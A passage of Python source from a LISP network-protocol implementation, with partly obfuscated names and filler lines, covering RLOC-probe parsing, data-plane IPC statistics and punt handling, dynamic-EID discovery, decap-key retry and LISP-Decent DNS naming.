    if (O0OO0ooO00 == False): return([packet, None, None, None])
    if 24 - 24: Ii1I + i11iIiiIii * I1Ii111 - OoOoOO00 / Ii1I - OoOoOO00

    # UDP source/dest ports at offsets 20/22; one of them must be the
    # LISP control port (both sides left in network byte order for the
    # comparison).
    O0o0oOOO = struct.unpack("H", packet[20:22])[0]
    IIi11 = struct.unpack("H", packet[22:24])[0]
    O0oOOOooo = (socket.htons(LISP_CTRL_PORT) in [O0o0oOOO, IIi11])
    if (O0oOOOooo == False): return([packet, None, None, None])
    if 52 - 52: o0oOOo0O0Ooo - i1IIi + OoOoOO00 / IiII

    # First LISP payload byte (offset 28 = 20 IP + 8 UDP) carries the
    # message type; filter per 'rr'.
    if (rr == 0):
        Ii1I11IiI1I1 = lisp_is_rloc_probe_request(packet[28])
        if (Ii1I11IiI1I1 == False): return([packet, None, None, None])
    elif (rr == 1):
        Ii1I11IiI1I1 = lisp_is_rloc_probe_reply(packet[28])
        if (Ii1I11IiI1I1 == False): return([packet, None, None, None])
    elif (rr == -1):
        Ii1I11IiI1I1 = lisp_is_rloc_probe_request(packet[28])
        if (Ii1I11IiI1I1 == False):
            Ii1I11IiI1I1 = lisp_is_rloc_probe_reply(packet[28])
            if (Ii1I11IiI1I1 == False): return([packet, None, None, None])
    if 24 - 24: IiII + OoooooooOO * Ii1I % iIii1I11I1II1
    if 22 - 22: I1Ii111 - I1ii11iIi11i . Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
    if 87 - 87: OoO0O00 + o0oOOo0O0Ooo
    if 46 - 46: oO0o + OoOoOO00
    if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
    if 59 - 59: O0

    # Outer IPv4 source address, offset 12.
    O0O00Oo = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    O0O00Oo.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    if 75 - 75: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i * oO0o * I11i / OoooooooOO
    if 17 - 17: Ii1I % I1ii11iIi11i + I11i
    if 80 - 80: i1IIi . OoooooooOO % OoooooooOO . oO0o / OOooOOo
    if 85 - 85: OOooOOo

    # Probe sourced by one of our own local addresses: caller drops it.
    if (O0O00Oo.is_local()): return([None, None, None, None])
    if 80 - 80: ooOoO0o % O0 % I1ii11iIi11i + Oo0Ooo
    if 82 - 82: oO0o / iIii1I11I1II1 % ooOoO0o . Ii1I / i1IIi - I1Ii111
    if 15 - 15: I11i - OOooOOo . II111iiii . iIii1I11I1II1
    if 93 - 93: I11i + o0oOOo0O0Ooo / OOooOOo + Ii1I % Oo0Ooo % I1ii11iIi11i

    # Source as a string, UDP source port in host order, and the outer
    # TTL (offset 8) minus 1 -- NOTE(review): presumably decremented to
    # mirror the forwarding hop; confirm against the probe-processing
    # callers. Then strip outer IPv4+UDP headers.
    O0O00Oo = O0O00Oo.print_address_no_iid()
    IIi1I1iII111 = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    oo0OOoOO0 = struct.unpack("B", packet[8])[0] - 1
    packet = packet[28::]
    if 72 - 72: IiII / II111iiii

    # Log the received probe.
    O0OooO0oo = bold("Receive(pcap)", False)
    iI1IiI11Ii11i = bold("from " + O0O00Oo, False)
    iIiiI11II11 = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(O0OooO0oo, len(packet), iI1IiI11Ii11i, IIi1I1iII111, iIiiI11II11))
    if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
    return([packet, O0O00Oo, IIi1I1iII111, oo0OOoOO0])
if 21 - 21: I1ii11iIi11i
if 60 - 60: i1IIi / OoO0O00 . Ii1I
if 16 - 16: i11iIiiIii + OoOoOO00 % Oo0Ooo + I1ii11iIi11i * Ii1I / I1Ii111
if 26 - 26: iII111i
if 31 - 31: iII111i
if 45 - 45: OoO0O00
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 + I11i - ooOoO0o + I1IiiI * O0
if 47 - 47: ooOoO0o + iIii1I11I1II1 * OOooOOo . I1IiiI . o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo . OoOoOO00 * OOooOOo
if 86 - 86: IiII * OOooOOo + Ii1I
if 62 - 62: I11i
def lisp_ipc_write_xtr_parameters(cp, dp):
    """
    Send an "xtr-parameters" IPC message to the external data-plane,
    telling it whether control-plane logging ('cp') and data-plane
    logging ('dp') are enabled and whether this process is an RTR.
    No-op when the data-plane IPC socket is not open.
    """
    # 'is None' instead of '== None' -- identity test is the idiom.
    if (lisp_ipc_dp_socket is None): return

    ipc = {"type": "xtr-parameters", "control-plane-logging": cp,
        "data-plane-logging": dp, "rtr": lisp_i_am_rtr}

    lisp_write_to_dp_socket(ipc)
    return
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
if 31 - 31: Ii1I
def lisp_external_data_plane():
    """
    Return True when an external data-plane is in use: either
    "ipc-data-plane = yes" appears in ./lisp.config, or the
    LISP_RUN_LISP_XTR environment variable is set.
    """
    grep = 'egrep "ipc-data-plane = yes" ./lisp.config'
    if (commands.getoutput(grep) != ""): return(True)

    # 'is not None' instead of '!= None' -- identity test is the idiom.
    if (os.getenv("LISP_RUN_LISP_XTR") is not None): return(True)
    return(False)
if 72 - 72: OoOoOO00 + o0oOOo0O0Ooo - i1IIi - OoO0O00 % OoOoOO00
if 42 - 42: oO0o / i1IIi . IiII
if 12 - 12: i11iIiiIii . ooOoO0o
if 80 - 80: O0 / iIii1I11I1II1 % iII111i * ooOoO0o / i11iIiiIii . OoOoOO00
if 88 - 88: OoooooooOO . I1IiiI
if 6 - 6: I1Ii111 - i11iIiiIii - oO0o
if 7 - 7: i1IIi
if 6 - 6: OoooooooOO - Oo0Ooo - I1ii11iIi11i
if 34 - 34: iII111i + i11iIiiIii . IiII
if 54 - 54: Oo0Ooo + I11i - iII111i * ooOoO0o % i11iIiiIii . IiII
if 29 - 29: II111iiii % i11iIiiIii % O0
if 38 - 38: o0oOOo0O0Ooo * IiII
if 51 - 51: OoooooooOO . Ii1I % OoooooooOO - I1IiiI + I1Ii111 % oO0o
if 28 - 28: i11iIiiIii - I1IiiI * OoO0O00
def lisp_process_data_plane_restart(do_clear=False):
    """
    The external data-plane restarted. Touch ./lisp.config so the
    configuration is re-read/re-pushed, then send the entire map-cache
    down the data-plane socket -- an empty entry list when 'do_clear'
    is requested.
    """
    os.system("touch ./lisp.config")

    entries = []
    if (do_clear == False):
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)

    lisp_write_to_dp_socket({"type": "entire-map-cache",
        "entries": entries})
    return
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 52 - 52: iIii1I11I1II1 + O0
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
if 63 - 63: ooOoO0o
if 22 - 22: OOooOOo . i11iIiiIii + II111iiii - Oo0Ooo % i1IIi / o0oOOo0O0Ooo
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    """
    Process a "statistics" IPC message from the data-plane. For each
    entry, find its map-cache entry and fold the reported per-RLOC
    packet/byte counters into our own stats. When a (unicast) entry's
    TTL has elapsed, refresh it by sending a Map-Request.

    Fixes: dict.has_key() (removed in Python 3) replaced by 'in'/.get();
    the inner loop no longer shadows the 'msg' parameter.
    """
    if ("entries" not in msg):
        lprint("No 'entries' in stats IPC message")
        return
    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return

    for entry in msg["entries"]:
        if ("eid-prefix" not in entry):
            lprint("No 'eid-prefix' in stats IPC message")
            continue
        eid_str = entry["eid-prefix"]

        if ("instance-id" not in entry):
            lprint("No 'instance-id' in stats IPC message")
            continue
        iid = int(entry["instance-id"])

        # Look up the EID-prefix in the map-cache.
        eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
        eid.store_prefix(eid_str)
        mc = lisp_map_cache_lookup(None, eid)
        if (mc == None):
            lprint("Map-cache entry for {} not found for stats update".format(eid_str))
            continue

        if ("rlocs" not in entry):
            lprint("No 'rlocs' in stats IPC message for {}".format(eid_str))
            continue
        if (type(entry["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue
        ipc_rlocs = entry["rlocs"]

        # Fold each reported RLOC's counters into our stats.
        for ipc_rloc in ipc_rlocs:
            if ("rloc" not in ipc_rloc): continue
            rloc_str = ipc_rloc["rloc"]
            if (rloc_str == "no-address"): continue

            rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
            rloc.store_address(rloc_str)
            rloc_entry = mc.get_rloc(rloc)
            if (rloc_entry == None): continue

            # Missing counters default to 0.
            pc = ipc_rloc.get("packet-count", 0)
            bc = ipc_rloc.get("byte-count", 0)
            sec = ipc_rloc.get("seconds-last-packet", 0)

            rloc_entry.stats.packet_count += pc
            rloc_entry.stats.byte_count += bc
            rloc_entry.stats.last_increment = lisp_get_timestamp() - sec

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
                sec, eid_str, rloc_str))

        # Refresh a unicast entry whose TTL has elapsed.
        if (mc.group.is_null() and mc.has_ttl_elapsed()):
            eid_str = green(mc.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(eid_str))
            lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
    return
if 20 - 20: iIii1I11I1II1 + Oo0Ooo - Ii1I / i11iIiiIii . OoO0O00
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
if 28 - 28: Ii1I - i11iIiiIii . oO0o / II111iiii
if 82 - 82: iII111i * iII111i . IiII * II111iiii
if 17 - 17: OoooooooOO % I1Ii111 * I1Ii111 / II111iiii . OoOoOO00 * iII111i
if 80 - 80: IiII % i11iIiiIii
if 6 - 6: II111iiii + i11iIiiIii - Oo0Ooo % OOooOOo + Oo0Ooo
if 46 - 46: iII111i
if 31 - 31: OoO0O00 + I1Ii111 / iIii1I11I1II1
if 11 - 11: ooOoO0o - OoOoOO00
if 19 - 19: O0 . OoOoOO00 - i1IIi . oO0o
if 96 - 96: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoO0O00 * iIii1I11I1II1 + ooOoO0o - ooOoO0o
if 4 - 4: OoO0O00 - OOooOOo
if 21 - 21: I1Ii111 * i11iIiiIii
if 63 - 63: oO0o + OoOoOO00
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
    """
    Process a "decap-statistics" IPC message from the data-plane. In
    the lisp-itr process, relay the message to the lisp-etr process
    (which owns decap state); in the lisp-etr process, fold the
    counters into lisp_decap_stats.

    Fixes: dict.has_key() (removed in Python 3) replaced by 'not in'.
    """
    # ITR case: forward to lisp-etr over the command IPC channel.
    if (lisp_i_am_itr):
        lprint("Send decap-stats IPC message to lisp-etr process")
        ipc = "stats%{}".format(json.dumps(msg))
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        return

    ipc = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc, msg))

    # When relayed by the ITR, the message arrives as a JSON string.
    if (lisp_i_am_etr): msg = json.loads(msg)

    key_names = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    for key_name in key_names:
        pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
        lisp_decap_stats[key_name].packet_count += pc

        bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
        lisp_decap_stats[key_name].byte_count += bc

        sec = 0 if (key_name not in msg) else \
            msg[key_name]["seconds-last-packet"]
        lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - sec
    return
if 51 - 51: oO0o / ooOoO0o - OOooOOo + oO0o
if 28 - 28: OoOoOO00 % I11i + o0oOOo0O0Ooo
if 51 - 51: iIii1I11I1II1 + I1ii11iIi11i % OoooooooOO + Ii1I
if 20 - 20: O0 * I1ii11iIi11i + OoOoOO00 * OOooOOo . i1IIi . o0oOOo0O0Ooo
if 26 - 26: OOooOOo - OoOoOO00 + I1ii11iIi11i + OoO0O00 - OoOoOO00 / o0oOOo0O0Ooo
if 76 - 76: I1ii11iIi11i / oO0o + Ii1I - O0
if 95 - 95: OoOoOO00
if 69 - 69: iII111i / Ii1I
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
if 92 - 92: OoO0O00 - iII111i
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    """
    Receive and dispatch one punt IPC message from the data-plane on
    'punt_socket'. "statistics", "decap-statistics", and "restart"
    messages go to their handlers; a "discovery" message may trigger
    dynamic-EID discovery for the source-EID and/or a (rate-limited)
    Map-Request for the dest-EID.

    Fixes: dict.has_key() (removed in Python 3) replaced by 'in'.
    """
    message, source = punt_socket.recvfrom(4000)

    msg = json.loads(message)
    if (type(msg) != dict):
        lprint("Invalid punt message from {}, not in JSON format".format(source))
        return

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if ("type" not in msg):
        lprint("Punt IPC message has no 'type' key")
        return

    # Statistics and restart messages are handled elsewhere.
    if (msg["type"] == "statistics"):
        lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
        return
    if (msg["type"] == "decap-statistics"):
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return
    if (msg["type"] == "restart"):
        lisp_process_data_plane_restart()
        return

    # Only "discovery" messages remain valid beyond this point.
    if (msg["type"] != "discovery"):
        lprint("Punt IPC message has wrong format")
        return
    if ("interface" not in msg):
        lprint("Invalid punt message from {}, required keys missing".format(source))
        return

    # Instance-ID comes from the interface, or literally from the
    # message when no interface name was supplied.
    device = msg["interface"]
    if (device == ""):
        iid = int(msg["instance-id"])
        if (iid == -1): return
    else:
        iid = lisp_get_interface_instance_id(device, None)

    # Validate optional source-EID.
    seid = None
    if ("source-eid" in msg):
        source_eid = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
        if (seid.is_null()):
            lprint("Invalid source-EID format '{}'".format(source_eid))
            return

    # Validate optional dest-EID.
    deid = None
    if ("dest-eid" in msg):
        dest_eid = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
        if (deid.is_null()):
            lprint("Invalid dest-EID format '{}'".format(dest_eid))
            return

    # Dynamic-EID discovery when the source-EID matches a database
    # mapping configured for dynamic-EIDs.
    if (seid):
        e = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if (db != None):
            if (db.dynamic_eid_configured()):
                interface = lisp_allow_dynamic_eid(device, seid)
                if (interface != None and lisp_i_am_itr):
                    # NOTE(review): lisp_itr_discover_eid() is defined
                    # with 5 parameters in this file but called with 4
                    # here, as in the original -- confirm which
                    # definition this process actually runs.
                    lisp_itr_discover_eid(db, seid, device, interface)
                else:
                    lprint(("Disallow dynamic source-EID {} " + \
                        "on interface {}").format(e, device))
        else:
            lprint("Punt from non-EID source {}".format(e))

    # Send a rate-limited Map-Request when there is no usable map-cache
    # entry for the destination.
    if (deid):
        mc = lisp_map_cache_lookup(seid, deid)
        if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
            if (lisp_rate_limit_map_request(seid, deid)): return
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None)
        else:
            e = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(e))
    return
if 12 - 12: I1IiiI + I1Ii111
if 66 - 66: I1Ii111 + OOooOOo + I1Ii111 . OoooooooOO * oO0o / OoO0O00
if 74 - 74: O0 % OOooOOo * OoOoOO00 / oO0o - Oo0Ooo
if 79 - 79: Ii1I + IiII
if 21 - 21: o0oOOo0O0Ooo * iII111i * o0oOOo0O0Ooo * o0oOOo0O0Ooo . Oo0Ooo
if 98 - 98: I1ii11iIi11i
if 58 - 58: IiII / i11iIiiIii % I11i
def lisp_ipc_map_cache_entry(mc, jdata):
    """
    Cache-walk callback: serialize map-cache entry 'mc' into an IPC
    record (without sending it) and collect it in 'jdata'. Returns
    [True, jdata] so the walk continues.
    """
    record = lisp_write_ipc_map_cache(True, mc, dont_send=True)
    jdata.append(record)
    return([True, jdata])
if 74 - 74: OoooooooOO - I1ii11iIi11i + OOooOOo % IiII . o0oOOo0O0Ooo
if 21 - 21: Ii1I
if 72 - 72: I1Ii111 . OoooooooOO / I1Ii111 - Ii1I / I1ii11iIi11i * I1ii11iIi11i
if 72 - 72: IiII . Ii1I + OoooooooOO * OoOoOO00 + Oo0Ooo . iII111i
if 92 - 92: O0 * Ii1I - I1ii11iIi11i - IiII . OoO0O00 + I1IiiI
if 59 - 59: i1IIi * OOooOOo % Oo0Ooo
if 44 - 44: iIii1I11I1II1 . OOooOOo
if 57 - 57: II111iiii + I1Ii111
def lisp_ipc_walk_map_cache(mc, jdata):
    """
    Walk the map-cache to serialize every entry into 'jdata'. A unicast
    entry (null group) is serialized directly; an (S,G) entry descends
    into its source-specific sub-cache when one exists.
    """
    if (mc.group.is_null() == False):
        # (S,G) entry: nothing to do unless a source cache hangs off it.
        if (mc.source_cache == None): return([True, jdata])
        jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
        return([True, jdata])

    # Unicast entry: serialize it directly.
    return(lisp_ipc_map_cache_entry(mc, jdata))
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
if 16 - 16: I11i
if 9 - 9: Ii1I / IiII * I11i - i11iIiiIii * I1ii11iIi11i / iII111i
if 61 - 61: O0 % iII111i
if 41 - 41: I1Ii111 * OoooooooOO
if 76 - 76: OoooooooOO * II111iiii . II111iiii / o0oOOo0O0Ooo - iII111i
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):
    """
    Record a dynamic-EID 'eid' discovered under database mapping 'db'.
    If already known, just refresh its last-packet timestamp; otherwise
    create the dynamic-EID state and tell the lisp-etr process (via
    IPC) to register it.

    NOTE(review): lisp_process_punt() in this file calls this function
    with only 4 arguments -- confirm which definition that call binds
    to at runtime.

    Fixes: dict.has_key() (removed in Python 3) replaced by 'in'.
    """
    eid_str = eid.print_address()
    if (eid_str in db.dynamic_eids):
        db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
        return

    # Build new dynamic-EID state keyed by printed EID address.
    dyn_eid = lisp_dynamic_eid()
    dyn_eid.dynamic_eid.copy_address(eid)
    dyn_eid.interface = routed_interface
    dyn_eid.last_packet = lisp_get_timestamp()
    dyn_eid.get_timeout(routed_interface)
    db.dynamic_eids[eid_str] = dyn_eid

    routed = ""
    if (input_interface != routed_interface):
        routed = ", routed-interface " + routed_interface

    eid_string = green(eid_str, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format(eid_string,
        input_interface, routed, dyn_eid.timeout))

    # Tell the lisp-etr process so it can register the dynamic-EID.
    ipc = "learn%{}%{}".format(eid_str, routed_interface)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    return
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
if 35 - 35: iII111i . OoOoOO00 + i1IIi . I1Ii111 - oO0o
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: i1IIi / IiII . O0
if 72 - 72: OOooOOo
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    """
    After an ICV failure for the decap keys stored under 'addr_str',
    search other decap-key entries whose key string contains
    'addr_str' (i.e. "addr:port" variants of the same RLOC). When one
    of them verifies 'packet_icv' over 'packet'/'iv', install it as the
    active entry for 'addr_str'. No-op unless lisp_search_decap_keys is
    enabled. Assumes 'addr_str' is already a key of
    lisp_crypto_keys_by_rloc_decap -- TODO confirm all callers ensure
    this.
    """
    if (lisp_search_decap_keys == False): return
    if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
    if 59 - 59: O0 + II111iiii + IiII % Oo0Ooo
    if 71 - 71: oO0o
    if 75 - 75: Oo0Ooo * oO0o + iIii1I11I1II1 / Oo0Ooo

    # A key containing ':' is already port-qualified (or IPv6) --
    # NOTE(review): presumably only plain IPv4 address keys are
    # retried; confirm intent.
    if (addr_str.find(":") != -1): return
    if 51 - 51: Ii1I * Ii1I + iII111i * oO0o / OOooOOo - ooOoO0o

    # Currently-installed entry for this address.
    II1i1i = lisp_crypto_keys_by_rloc_decap[addr_str]
    if 16 - 16: I1Ii111 + O0 - O0 * iIii1I11I1II1 / iII111i

    # Note: iterates the dict while possibly reassigning an existing
    # key's value below -- safe, since no key is added or removed.
    for iII1 in lisp_crypto_keys_by_rloc_decap:
        if 4 - 4: iII111i
        if 75 - 75: I1IiiI * IiII % OoO0O00 - ooOoO0o * iII111i
        if 32 - 32: iII111i
        if 59 - 59: OoOoOO00 - I1Ii111
        # Only consider keys for the same base address...
        if (iII1.find(addr_str) == -1): continue
        if 34 - 34: ooOoO0o . OoooooooOO / ooOoO0o + OoooooooOO
        if 24 - 24: OoooooooOO * I1ii11iIi11i / O0 / Oo0Ooo * I1IiiI / ooOoO0o
        if 33 - 33: Ii1I
        if 20 - 20: Ii1I + I11i
        # ...but skip the entry we already tried.
        if (iII1 == addr_str): continue
        if 98 - 98: OOooOOo
        if 58 - 58: i11iIiiIii / OoOoOO00
        if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
        if 83 - 83: OoO0O00 - Oo0Ooo * I1IiiI % Oo0Ooo % oO0o
        # Skip candidates holding the identical key state.
        iIiiiIIiii = lisp_crypto_keys_by_rloc_decap[iII1]
        if (iIiiiIIiii == II1i1i): continue
        if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
        if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
        if 52 - 52: IiII . oO0o + i11iIiiIii % IiII
        if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
        # Try the candidate's key (slot 1) against the packet ICV.
        iIi1iI11I1i1 = iIiiiIIiii[1]
        if (packet_icv != iIi1iI11I1i1.do_icv(packet, iv)):
            lprint("Test ICV with key {} failed".format(red(iII1, False)))
            continue
        if 93 - 93: II111iiii
        if 85 - 85: O0 . II111iiii - Ii1I * I1ii11iIi11i / I1ii11iIi11i . OoOoOO00
        # Candidate verified -- make it the active entry for addr_str.
        lprint("Changing decap crypto key to {}".format(red(iII1, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = iIiiiIIiii
        if 55 - 55: OoooooooOO
    return
if 26 - 26: OoooooooOO * iII111i - iIii1I11I1II1 + I1ii11iIi11i
if 37 - 37: iII111i - OoooooooOO . i11iIiiIii * i1IIi - II111iiii * ooOoO0o
if 54 - 54: OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
if 41 - 41: oO0o . II111iiii
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
def lisp_decent_pull_xtr_configured():
    """
    A LISP-Decent pull-based mapping system is in use when both the
    modulus and the DNS suffix have been configured.
    """
    have_modulus = (lisp_decent_modulus != 0)
    have_suffix = (lisp_decent_dns_suffix != None)
    return(have_modulus and have_suffix)
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
if 28 - 28: IiII + I11i
if 1 - 1: OoooooooOO - i11iIiiIii . OoooooooOO - o0oOOo0O0Ooo - OOooOOo * I1Ii111
if 56 - 56: Ii1I . OoO0O00
if 43 - 43: iII111i * iII111i
if 31 - 31: O0 - iIii1I11I1II1 . I11i . oO0o
if 96 - 96: OoooooooOO * iIii1I11I1II1 * Oo0Ooo
def lisp_is_decent_dns_suffix(dns_name):
    """
    Return True when 'dns_name', with its first label stripped, equals
    the configured LISP-Decent DNS suffix. False when no suffix is
    configured.
    """
    if (lisp_decent_dns_suffix == None): return(False)
    labels = dns_name.split(".")
    parent = ".".join(labels[1::])
    return(parent == lisp_decent_dns_suffix)
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
if 47 - 47: OOooOOo * oO0o
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
def lisp_get_decent_index(eid):
    """
    Map an EID to its LISP-Decent index: SHA-256 of the printed
    EID-prefix, taken modulo lisp_decent_modulus.
    """
    prefix = eid.print_prefix()
    digest = hashlib.sha256(prefix).hexdigest()
    return(int(digest, 16) % lisp_decent_modulus)
if 30 - 30: OoOoOO00 + OoooooooOO - OoOoOO00 / Ii1I - Ii1I / i11iIiiIii
if 48 - 48: iIii1I11I1II1 % OoooooooOO * Ii1I . i1IIi . oO0o % iIii1I11I1II1
if 89 - 89: I11i + I11i * OoooooooOO + IiII % iIii1I11I1II1
if 52 - 52: i1IIi
if 85 - 85: I1Ii111 - iII111i
if 44 - 44: I11i - I11i - IiII . I11i
if 34 - 34: iIii1I11I1II1 - oO0o * i11iIiiIii * o0oOOo0O0Ooo
def lisp_get_decent_dns_name(eid):
    """
    Build the "<index>.<suffix>" DNS name the LISP-Decent mapping
    system uses for 'eid'.
    """
    return(".".join([str(lisp_get_decent_index(eid)),
        lisp_decent_dns_suffix]))
if 15 - 15: I1Ii111
if 25 - 25: I1ii11iIi11i * O0
if 8 - 8: i11iIiiIii
if 95 - 95: ooOoO0o + i1IIi / OOooOOo . i11iIiiIii
if 31 - 31: iII111i - iII111i - oO0o
if 62 - 62: Oo0Ooo % Oo0Ooo / OoooooooOO * o0oOOo0O0Ooo . Ii1I
if 1 - 1: I1ii11iIi11i / II111iiii / II111iiii + o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
def lisp_get_decent_dns_name_from_str(iid, eid_str):
    """
    Like lisp_get_decent_dns_name() but starts from an instance-ID and
    an EID string instead of a lisp_address object.
    """
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    return(".".join([str(lisp_get_decent_index(eid)),
        lisp_decent_dns_suffix]))
if 87 - 87: OOooOOo * OoO0O00
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
if 86 - 86: II111iiii
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
if 40 - 40: Oo0Ooo . II111iiii / II111iiii - i1IIi
